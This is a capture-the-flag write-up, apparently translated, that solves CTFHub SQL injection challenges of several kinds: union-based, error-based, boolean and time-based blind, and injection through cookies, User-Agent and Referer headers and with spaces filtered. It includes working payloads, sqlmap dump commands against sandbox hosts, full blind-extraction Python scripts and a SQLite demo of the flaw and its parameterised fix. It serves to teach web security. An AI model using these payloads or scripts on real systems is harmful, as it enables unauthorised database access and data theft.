Integer-type injection
Flag & basic steps: the same procedure works for any numeric (integer-type) injection
Method 1: brute force by hand
1. Check whether the parameter is injectable
1 and 1=1 returns the normal page
1 and 1=2 returns nothing or an error
(the numeric parameter is spliced into the query unquoted, so the appended condition is evaluated as SQL)
2. Find the number of columns
order by x (x is a number)
ORDER BY sorts the result set by the given column; ordering by a column number larger than the number of columns in the SELECT makes the query fail
Try the numbers one at a time: order by 1 and order by 2 work, order by 3 errors
So the query returns two columns
3. Next, find the database name
1 and 1=2 union select 1,database()
(and 1=2 empties the real result set, so the row supplied by the UNION is the only one the page displays)
This gives the database name sqli
4. Find the table names
1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'
This gives the tables news,flag
5. Find the column names
1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'
(add and table_schema='sqli' if another database on the server also has a table called flag)
This gives the column flag
6. Dump the flag
1 and 1=2 union select 1,group_concat(flag) from sqli.flag
This gives ctfhub{7f95c9e82c76993d6695e97631bf80b646c2fd5c}
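To see why the six steps work without a live target, here is an added example (not part of the original writeup) that rebuilds the vulnerable lookup in SQLite. Assumptions: the news/flag schema and the flag value are constructed; SQLite's sqlite_master stands in for MySQL's information_schema and there is no database() function, so the table and column steps read sqlite_master instead. safe_lookup is the fix: with a bound parameter the same payload is one value that matches no row.

```python
import sqlite3

# Constructed stand-in for the challenge database (made-up flag, SQLite instead of MySQL).
SAMPLE_FLAG = "ctfhub{constructed_sample_flag}"


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript(f"""
        CREATE TABLE news(id INTEGER, title TEXT, body TEXT);
        INSERT INTO news VALUES (1, 'hello', 'first post'), (2, 'foo', 'second post');
        CREATE TABLE flag(flag TEXT);
        INSERT INTO flag VALUES ('{SAMPLE_FLAG}');
    """)
    return con


def vulnerable_lookup(con, user_id):
    # The bug: the id parameter is pasted straight into the SQL text, unquoted.
    sql = f"SELECT title, body FROM news WHERE id={user_id}"
    return con.execute(sql).fetchall()


def safe_lookup(con, user_id):
    # The fix: a bound parameter. The whole payload becomes one value that matches no row.
    return con.execute("SELECT title, body FROM news WHERE id=?", (user_id,)).fetchall()


def count_columns(con, max_cols=16):
    # Step 2 of the writeup: `order by n` errors out once n exceeds the column count.
    for n in range(1, max_cols + 1):
        try:
            vulnerable_lookup(con, f"1 order by {n}")
        except sqlite3.OperationalError:
            return n - 1
    return max_cols


def union_extract(con, select_expr, from_clause):
    # Steps 3-6: blank out the real row with `and 1=2`, then UNION our own two-column row in.
    payload = f"1 and 1=2 union select 1,{select_expr} from {from_clause}"
    rows = vulnerable_lookup(con, payload)
    return rows[0][1] if rows else None


def run_chain(con):
    # The writeup's chain against the SQLite stand-in (sqlite_master instead of information_schema).
    tables = union_extract(con, "group_concat(name)", "sqlite_master where type='table'")
    create_stmt = union_extract(con, "sql", "sqlite_master where name='flag'")
    flag = union_extract(con, "group_concat(flag)", "flag")
    return {"tables": tables, "flag_table_ddl": create_stmt, "flag": flag}


if __name__ == "__main__":
    db = make_db()
    print("columns:", count_columns(db))
    print(run_chain(db))
    print("parameterised:", safe_lookup(db, "1 and 1=2 union select 1,2 from flag"))
```

The column count found by count_columns is what decides how many expressions the UNION needs; a mismatch there is the usual reason a union payload "does nothing".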
This material is covered in full in the detailed SQL injection article.
Method 2: script (sqlmap)
Note: the sqlmap copy used here is run under Python 2 (current sqlmap releases also run on Python 3)
1. Database names
python2 sqlmap.py -u http://challenge-c210e68234c348d4.sandbox.ctfhub.com:10080/?id=1 --dbs
2. Table names
python2 sqlmap.py -u http://challenge-c210e68234c348d4.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables
3. Column names
python2 sqlmap.py -u http://challenge-c210e68234c348d4.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns
4. Data
python2 sqlmap.py -u http://challenge-c210e68234c348d4.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag -C flag --dump
sqlmap usage and steps
sqlmap -u "url" --dbs                                                # list databases
sqlmap -u "url" --current-user                                       # current database user
sqlmap -u "url" --current-db                                         # current database name
sqlmap -u "url" -D 'dbname' --tables                                 # list tables
sqlmap -u "url" -D 'dbname' -T 'table' --columns                     # list columns
sqlmap -u "url" -D 'dbname' -T 'table' -C 'col1,col2,...' --dump     # dump column contents
Other sqlmap details will be covered in the sqlmap hands-on article.
Character-type injection
Flag
1. Find the database name (same union payload as the integer case, with the quote closed as in the steps below)
2. Find the table names
112' union select group_concat(table_name),2 from information_schema.tables where table_schema='sqli'#
3. Find the column names
1' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag
4. Dump the column
123' union select flag,2 from flag#
Overall the only difference is how the quote is closed: the parameter is wrapped in single quotes server-side, so the payload starts with a quote to end the application's string, and then either finishes with # to comment out the trailing quote (steps 2 and 4) or leaves its last string literal open so the application's own closing quote completes it (step 3). Either UNION column position can carry the data, as long as the page echoes that column.
SQL error-based injection
Flag
The page shows no query results, only MySQL errors, so the data is smuggled into the error text: grouping on concat(<value>,'&',floor(rand(0)*2)) makes MySQL raise a duplicate-key error whose message echoes <value>.
1. Database
1 Union select count(*),concat((select database()),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
2. Tables
1 Union select count(*),concat((select table_name from information_schema.tables where table_schema='sqli' limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
The first table returned is not the one we want (the subquery inside concat() must return a single row, so limit 0,1 only shows the first table), so move on to the next row:
1 Union select count(*),concat((select table_name from information_schema.tables where table_schema='sqli' limit 1,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
3. Columns
1 Union select count(*),concat((select column_name from information_schema.columns where table_name='flag' limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
4. Column data
1 Union select count(*),concat((select flag from sqli.flag),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
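An added illustration (not from the original writeup) of why this payload errors at all: a small Python model of MySQL evaluating the group key twice per row, plus the regex that pulls the value back out of the error text. The rand(0) prefix and the error message format are assumptions taken from common write-ups and are only used to drive the model; the mechanism needs nothing more than a 0 followed by two 1s in the sequence.

```python
import itertools
import re

# Commonly quoted prefix of the values floor(rand(0)*2) yields in MySQL (assumption: taken
# from write-ups, used only to drive the model; the point is that rand(0) is deterministic).
RAND0_FLOOR_PREFIX = [0, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1]


class DuplicateEntry(Exception):
    """Stands in for MySQL error 1062."""


def simulate_group_by(leaked_value, row_count, rand_seq=RAND0_FLOOR_PREFIX):
    """Model of `select count(*),concat(<v>,0x26,floor(rand(0)*2))x from T group by x`.

    For each scanned row MySQL computes the group key once to look it up in the temporary
    group table; if the key is new it computes the expression AGAIN to insert the row.
    rand() moves on between the two evaluations, so the inserted key can collide with one
    already present, and MySQL raises "Duplicate entry '...' for key 'group_key'".
    """
    rands = itertools.cycle(rand_seq)
    groups = {}
    for _ in range(row_count):
        key = f"{leaked_value}&{next(rands)}"            # evaluation 1: lookup
        if key in groups:
            groups[key] += 1
            continue
        key = f"{leaked_value}&{next(rands)}"            # evaluation 2: insert
        if key in groups:
            raise DuplicateEntry(f"Duplicate entry '{key}' for key 'group_key'")
        groups[key] = 1
    return groups


def collides(leaked_value, row_count):
    # True when grouping `row_count` rows triggers the duplicate-key error.
    try:
        simulate_group_by(leaked_value, row_count)
    except DuplicateEntry:
        return True
    return False


def error_payload(subquery):
    # The writeup's payload shape; `subquery` must return exactly one row (hence limit n,1).
    return (f"1 union select count(*),concat(({subquery}),0x26,floor(rand(0)*2))x "
            f"from information_schema.columns group by x")


def leak_from_error(message):
    # Recover the smuggled value from the error text; 0x26 is the '&' separator.
    m = re.search(r"Duplicate entry '(.*)&[01]' for key", message)
    return m.group(1) if m else None


def demo(secret="sqli"):
    # information_schema.columns has far more than three rows, so the collision is guaranteed.
    try:
        simulate_group_by(secret, row_count=100)
    except DuplicateEntry as e:
        return leak_from_error(str(e))
    return None
```

Two practical limits follow from the model: the collision needs at least three rows in the table being grouped (which is why the payload groups over information_schema.columns rather than the tiny flag table), and MySQL truncates the key shown in the error message at 64 characters, so a long value has to be read in slices with substr().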
Boolean-based blind injection
Straight to the script (the page prints query_success when the injected query ran without error; that string is the true/false signal):
import requests

urls = 'http://challenge-cbd41590d122d86c.sandbox.ctfhub.com:10080/?id='
true = 'query_success'   # string the page prints when the injected query succeeded
# False branch: a multi-row subquery in scalar position makes MySQL error out, so the page
# does NOT print query_success. That is the boolean signal.
FALSE_BRANCH = '(select table_name from information_schema.tables)'
LETTERS = 'abcdefghijklmnopqrstuvwxyz'


def ask(condition):
    # True when the condition holds on the server.
    url = urls + 'if(%s,1,%s)' % (condition, FALSE_BRANCH)
    return true in requests.get(url).text


def guess_word(expr, max_len=8):
    # Recover a lowercase identifier one character at a time; substr() positions are 1-based.
    name = ''
    for number in range(1, max_len):
        for letter in LETTERS:
            if ask('substr((%s),%d,1)="%s"' % (expr, number, letter)):
                name = name + letter
                print(name, '...')
                break
        else:
            break   # no letter matched: end of the word
    return name


def database_name():
    name = guess_word('select database()')
    print('\n>>>database_name=', name, '<<<\n')
    return name


def table_name():
    names = []
    for number1 in range(3):
        names.append(guess_word('select table_name from information_schema.tables '
                                'where table_schema=database() limit %d,1' % number1))
    print('\n>>>table_name=', names, '<<<\n')
    return names


def column_name():
    names = []
    for number1 in range(3):
        names.append(guess_word('select column_name from information_schema.columns '
                                'where table_name="flag" and table_schema=database() limit %d,1' % number1))
    print('\n>>>column_name=', names, '<<<\n')
    return names


def get_flag():
    # The flag contains digits and braces, so compare ASCII codes rather than letters.
    name = ''
    for number1 in range(1, 50):
        for number2 in range(48, 126):
            if ask('ascii(substr((select flag from flag),%d,1))=%d' % (number1, number2)):
                name = name + chr(number2)
                print(name, '...')
                break
        else:
            break   # ascii('') is 0 and matched nothing: past the end of the flag
    print('\n>>>flag=', name, '<<<\n')
    return name


if __name__ == '__main__':
    database_name()
    table_name()
    column_name()
    get_flag()
Time-based blind injection
Flag
The detailed method is covered in a dedicated article.
Straight to the code (the injected if(...) calls sleep(1) when the condition holds, so the response time is the signal):
import requests, time

urls = 'http://challenge-b8d41d0852a2709a.sandbox.ctfhub.com:10080/?id='
LETTERS = 'qwertyuioplkjhgfdsazxcvbnm'
SLEEP = 1   # seconds the true branch sleeps


def ask(condition):
    # True when the injected condition held: the server slept before answering.
    url = urls + 'if(%s,sleep(%d),1)' % (condition, SLEEP)
    current1_time = time.time()
    requests.get(url)
    current2_time = time.time()
    return current2_time - current1_time >= SLEEP


def guess_word(expr, max_len=8):
    # substr() positions start at 1; position 0 would always return ''.
    name = ''
    for number in range(1, max_len):
        for letter in LETTERS:
            if ask('substr((%s),%d,1) = "%s"' % (expr, number, letter)):
                name = name + letter
                print(name)
                break
        else:
            break   # nothing matched: end of the word
    return name


def database_name():
    name = guess_word('select database()')
    print(name)
    return name


def table_name():
    array = []
    for number1 in range(4):
        array.append(guess_word('select table_name from information_schema.tables '
                                'where table_schema="sqli" limit %d,1' % number1))
    print(array)
    return array


def column_name():
    # the flag table has a single column, so limit 0,1 is enough
    name = guess_word('select column_name from information_schema.columns '
                      'where table_name="flag" and table_schema="sqli" limit 0,1')
    print(name)
    return name


def flag():
    name = ''
    for number1 in range(1, 50):
        for number2 in range(48, 126):
            if ask('substr((select flag from sqli.flag),%d,1) = "%s"' % (number1, chr(number2))):
                name = name + chr(number2)
                print(name)
                break
        else:
            break   # past the end of the flag
    print(name)
    return name


if __name__ == '__main__':
    database_name()
    table_name()
    column_name()
    flag()
Remember to convert the result to lowercase: substr(...) = "X" is a string comparison, which is case-insensitive under MySQL's default collation, and the loop tries the uppercase codes (65-90) before the lowercase ones (97-122), so the letters of the flag come back in uppercase. Comparing ascii(substr(...)) with a number, as the boolean script does, avoids the problem.
MySQL structure
Flag
Not confident doing this one by hand yet, so sqlmap was used straight away (the same --dbs, --tables, --columns, --dump sequence as above).
Note which of the two tables the flag is in: dumping the other one only returns its column information, not the flag.
Cookie injection
Same technique; the injection point just moves from the URL to the Cookie header, so the payloads are sent from an intercepting proxy instead of the address bar.
Flag
By hand
First send id=1 and look at the response.
The rest follows the same pattern. The + signs below stand for spaces: the cookie value is URL-decoded server-side (PHP, for example, URL-decodes $_COOKIE values), so + becomes a space.
1. Database
1+and+1=2+union+select+database(),2#
2. Tables
1+and+1=2+union+select+group_concat(table_name),2+from+information_schema.tables+where+table_schema='sqli'#
3. Columns
1+and+1=2+union+select+group_concat(column_name),2+from+information_schema.columns+where+table_name='sjezkujtwr'#
4. Column data
1+and+1=2+union+select+cinmtrnyyz,2+from+sqli.sjezkujtwr#
The sqlmap invocation for cookie injection differs from the earlier ones, so it is spelled out here.
Script: sqlmap
1. Database names
python2 sqlmap.py -u http://challenge-6e98ef84482d1504.sandbox.ctfhub.com:10080/ --cookie="id=1" --dbs
(if sqlmap reports the cookie as not injectable, add --level 2: cookie values are only tested from level 2 upward, User-Agent and Referer from level 3)
2. Table names
python2 sqlmap.py -u http://challenge-6e98ef84482d1504.sandbox.ctfhub.com:10080/ --cookie="id=1" -D sqli --tables
After the above you can guess that the flag is in sjezkujtwr
3. Columns
python2 sqlmap.py -u http://challenge-6e98ef84482d1504.sandbox.ctfhub.com:10080/ --cookie="id=1" -D sqli -T sjezkujtwr --columns
4. Column data
python2 sqlmap.py -u http://challenge-6e98ef84482d1504.sandbox.ctfhub.com:10080/ --cookie="id=1" -D sqli -T sjezkujtwr -C cinmtrnyyz --dump
UA injection
Flag
By hand
Same injection as before; the only change is that the payload now goes into the User-Agent header.
1. Database
1 and 1=2 union select database(),2#
2. Tables
1 and 1=2 union select group_concat(table_name),2 from information_schema.tables where table_schema='sqli'#
3. Columns
1 and 1=2 union select group_concat(column_name),2 from information_schema.columns where table_name='vukfimjwtg'#
4. Column data
1 and 1=2 union select lgbnyifysd,2 from sqli.vukfimjwtg#
Python code
To be written...
Space filtering
Flag
By hand
Still the same chain; the only change is that every space is replaced by an inline comment /**/, which MySQL treats as whitespace.
1. Database
1/**/and/**/1=2/**/union/**/select/**/database(),2#
2. Tables
1/**/and/**/1=2/**/union/**/select/**/group_concat(table_name),2/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'
3. Columns
1/**/and/**/1=2/**/union/**/select/**/group_concat(column_name),2/**/from/**/information_schema.columns/**/where/**/table_name='jdyrbbxovi'
4. Column data
1/**/and/**/1=2/**/union/**/select/**/sfuqqyytbz,2/**/from/**/sqli.jdyrbbxovi
Script: sqlmap
To be written (sqlmap's --tamper=space2comment applies the same substitution).
Referer injection
Flag
By hand
The payloads are the same as for the UA case (sent in the Referer header instead of User-Agent), so they are not repeated.
1. Tables
2. Columns
3. Column data
Done!
A more detailed analysis of all of the above will follow in the SQL injection (beginner) article:
[Original, in depth, very detailed] SQL injection summary (beginner and CTF sections)
FROM: 浅浅淡淡 [hellohy]
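The character-type, cookie, User-Agent, Referer and space-filtered variants above all reuse one union payload; only the quoting context and the carrier change. The following is an added example (not the page's code) that builds that payload for an integer or single-quoted context, applies the /**/ substitution in a quote-aware way (a plain replace would also mangle spaces inside a string literal), and maps the result onto the right part of the request. The target URL is a placeholder, and the cookie branch assumes a server that URL-decodes cookie values, as PHP does.

```python
from urllib.parse import quote


def space2comment(payload):
    # Replace each space outside a single-quoted literal with an inline comment, which MySQL
    # treats as whitespace. Quote-aware so a literal such as 'a b' is left intact.
    out, in_literal = [], False
    for ch in payload:
        if ch == "'":
            in_literal = not in_literal
        out.append("/**/" if ch == " " and not in_literal else ch)
    return "".join(out)


def union_payload(context, select_list, from_clause=None, space_filtered=False):
    """Build the writeup's `and 1=2 union select ...` payload for a given injection context.

    context: 'int' -> id=1 and 1=2 union ...     (nothing to close)
             'str' -> id='1' and 1=2 union ...   (close the quote, comment out the rest)
    """
    prefix = {"int": "1", "str": "1'"}[context]
    body = f"{prefix} and 1=2 union select {select_list}"
    if from_clause:
        body += f" from {from_clause}"
    body += "#"                      # swallow whatever the application appends
    return space2comment(body) if space_filtered else body


def build_request(base_url, carrier, payload):
    """Describe the HTTP request that delivers `payload` through the chosen carrier.

    Returns a plain dict (method, url, headers) that any HTTP client can send.
    Assumption: the target URL-decodes cookie values (PHP does), so the cookie value is
    percent-encoded; header carriers (User-Agent, Referer) are sent verbatim.
    """
    headers = {}
    url = base_url
    if carrier == "get":
        url = f"{base_url}?id={quote(payload)}"
    elif carrier == "cookie":
        headers["Cookie"] = f"id={quote(payload)}"
    elif carrier == "ua":
        headers["User-Agent"] = payload
    elif carrier == "referer":
        headers["Referer"] = payload
    else:
        raise ValueError(f"unknown carrier {carrier!r}")
    return {"method": "GET", "url": url, "headers": headers}


def send(spec):
    # Live use only; needs the requests package.
    import requests
    return requests.request(spec["method"], spec["url"], headers=spec["headers"], timeout=10)


if __name__ == "__main__":
    p = union_payload("str", "group_concat(table_name),2",
                      "information_schema.tables where table_schema='sqli'", space_filtered=True)
    print(p)
    print(build_request("http://target.example/", "cookie", p))
```

The percent-encoding in the cookie branch is the programmatic form of the + signs used in the cookie section: both rely on the server decoding the value before it reaches the query.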